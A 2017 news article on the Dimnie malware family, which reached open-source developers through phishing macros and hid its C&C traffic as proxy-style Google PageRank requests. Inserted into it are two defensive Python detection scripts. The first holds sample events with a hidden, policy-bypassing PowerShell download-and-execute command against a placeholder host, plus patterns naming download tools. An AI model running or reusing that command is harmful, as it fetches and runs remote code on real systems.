The camouflage capabilities of the Dimnie malware family meant that researchers didn't spot it for a long time

Mar 30, 2017 23:29 GMT  ·  By

For more than three years, one malware family managed to fly under the radar of researchers thanks to its stealthy command and control methods. 

According to researchers from Palo Alto Networks, the malware family, dubbed Dimnie, was discovered in mid-January in the middle of a campaign targeting open-source developers via phishing emails. The emails carried a malicious .doc attachment whose embedded macro code executes a PowerShell command that downloads and runs a second-stage file.
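The delivery chain described above, an Office document whose macro launches PowerShell to fetch and run a payload, is something a defender can look for in process-creation telemetry. The script below is an added example, not code from the article or from Palo Alto Networks: it runs a simple rule over constructed, Sysmon-style events (parent image, child image, command line) and flags an Office application spawning a shell, with extra weight for download-cradle and evasion switches. The event lines, paths and the `example.invalid` URL are all made up for the illustration.

```python
"""Constructed detection example for the macro -> PowerShell downloader pattern.
Events are synthetic, in a simplified 'parent|image|command_line' format."""
import re

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    "C:\\Program Files\\Microsoft Office\\WINWORD.EXE|"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -w hidden -ep bypass -c IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/a')",
    "C:\\Windows\\explorer.exe|"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -File C:\\scripts\\backup.ps1",
    "C:\\Program Files\\Microsoft Office\\EXCEL.EXE|C:\\Windows\\System32\\cmd.exe|"
    "cmd.exe /c powershell -nop -w hidden -e SQBFAFgA",
    "C:\\Windows\\explorer.exe|C:\\Program Files\\Microsoft Office\\WINWORD.EXE|"
    "WINWORD.EXE /n report.doc",
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Download-cradle primitives and an encoded-command switch (-e / -enc / -EncodedCommand).
SUSPICIOUS_CMD = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|bitsadmin"
    r"|\s-e(nc(odedcommand)?)?\s", re.I)
# Switches used to hide the window or skip policy/profile checks.
EVASION = re.compile(
    r"-w(indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass|-nop\b|-noprofile", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(line):
    """Return the list of rule names that match one event (empty when clean)."""
    parent, image, cmd = line.split("|", 2)
    hits = []
    if basename(parent) in OFFICE_APPS and basename(image) in SHELLS:
        hits.append("office_spawns_shell")
    if SUSPICIOUS_CMD.search(cmd):
        hits.append("suspicious_command")
    if EVASION.search(cmd):
        hits.append("evasion_flags")
    return hits


def find_suspicious(events):
    """Only the Office -> shell chain is alert-worthy on its own; the other
    rules enrich it so an analyst sees why the child process looks bad."""
    results = []
    for index, event in enumerate(events):
        hits = score_event(event)
        if "office_spawns_shell" in hits:
            results.append((index, hits))
    return results


if __name__ == "__main__":
    for index, hits in find_suspicious(SAMPLE_EVENTS):
        print(index, hits)
```

The ordinary PowerShell launch from Explorer (event 1) is deliberately not flagged: the parent-child relationship, not PowerShell itself, is the signal worth alerting on.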

Palo Alto Networks says it observed samples of this malware as far back as early 2014, with identical command and control mechanisms. "The malware family serves as a downloader and has a modular design encompassing various information stealing functionalities. Each module is injected into the memory of core Windows processes, further complicating analysis. During its lifespan, it appears to have undergone few changes and its stealthy command and control methods combined with a previously Russian focused target base has allowed it to fly under the radar up until this most recent campaign," researchers explain in a post.

Stealthy job

By examining the malware's communication with its C&C infrastructure, the researchers determined that it formats its requests as HTTP proxy requests (an absolute URI in the request line) addressed to the Google PageRank service, which Google shut down in 2016. The absolute URI points at a service that no longer exists, and the server receiving the request is not acting as a proxy at all; the proxy-style format is simply camouflage that makes the C&C traffic resemble a routine query to Google.
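The telltale in this technique is a request in proxy form (absolute URI in the request line) that is sent straight to a host which is not one of the network's configured proxies. The script below is an added example, not from the article or from Palo Alto Networks: it classifies constructed flow records (destination address, request line, Host header) against an assumed list of known proxies, and groups offenders by destination so a repeated beacon to one address stands out. All addresses, hostnames and the `KNOWN_PROXIES` set are made up for the illustration.

```python
"""Constructed example: flag absolute-form HTTP requests sent to non-proxy servers."""
from urllib.parse import urlsplit

# Assumed forward proxies for this constructed network. Per RFC 7230 section 5.3.2
# a client only uses absolute-form request targets when talking to a proxy.
KNOWN_PROXIES = {"10.0.0.8:3128"}

# Constructed flow records: (destination "ip:port", request line, Host header).
SAMPLE_REQUESTS = [
    ("10.0.0.8:3128", "GET http://www.example.com/index.html HTTP/1.1", "www.example.com"),
    ("203.0.113.45:80", "GET http://toolbar.example.com/pr?site=x HTTP/1.1", "toolbar.example.com"),
    ("93.184.216.34:80", "GET /index.html HTTP/1.1", "www.example.com"),
    ("203.0.113.45:80", "POST http://search.example.com/s?q=1 HTTP/1.1", "search.example.com"),
]


def parse_request_line(line):
    """Split 'METHOD target HTTP/x.y' into its three parts."""
    method, target, version = line.split(" ", 2)
    return method, target, version


def is_absolute_form(target):
    """True for 'http://host/path' style targets, False for '/path' (origin form)."""
    parts = urlsplit(target)
    return bool(parts.scheme) and bool(parts.netloc)


def classify(dst, request_line, host_header):
    """Return a list of findings for one request; empty means nothing odd."""
    _, target, _ = parse_request_line(request_line)
    findings = []
    if is_absolute_form(target):
        if dst not in KNOWN_PROXIES:
            findings.append("absolute_uri_to_non_proxy")
        authority = urlsplit(target).netloc
        # A proxy-form request should name the same host in the URI and Host header.
        if host_header and host_header.lower() != authority.lower():
            findings.append("host_header_mismatch")
    return findings


def camouflaged_c2_candidates(records):
    """Map each non-proxy destination to the URI authorities it was asked for,
    so one address answering 'proxy' requests for several hosts is obvious."""
    by_dst = {}
    for dst, line, host in records:
        if "absolute_uri_to_non_proxy" in classify(dst, line, host):
            authority = urlsplit(parse_request_line(line)[1]).netloc
            by_dst.setdefault(dst, []).append(authority)
    return by_dst


if __name__ == "__main__":
    for dst, hosts in camouflaged_c2_candidates(SAMPLE_REQUESTS).items():
        print(dst, "received absolute-form requests for", hosts)
```

The first record is a normal request through the configured proxy and the third is an ordinary direct request, so neither is reported; only the two proxy-form requests delivered to 203.0.113.45 are, which is exactly the shape of traffic the article describes.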

The researchers concluded that the malware's main functionality is information theft and reconnaissance. Its modular framework, however, lets the operators deploy a wider range of capabilities than were observed during the analysis.

"Multiple factors have contributed to Dimnie’s relatively long-lived existence. By masking upload and download network traffic as innocuous user activity, Dimnie has taken advantage of defenders’ assumptions about what normal traffic looks like. This blending in tactic, combined with a prior penchant for targeting systems used by Russian speakers, likely allowed Dimnie to remain relatively unknown," Palo Alto researchers conclude.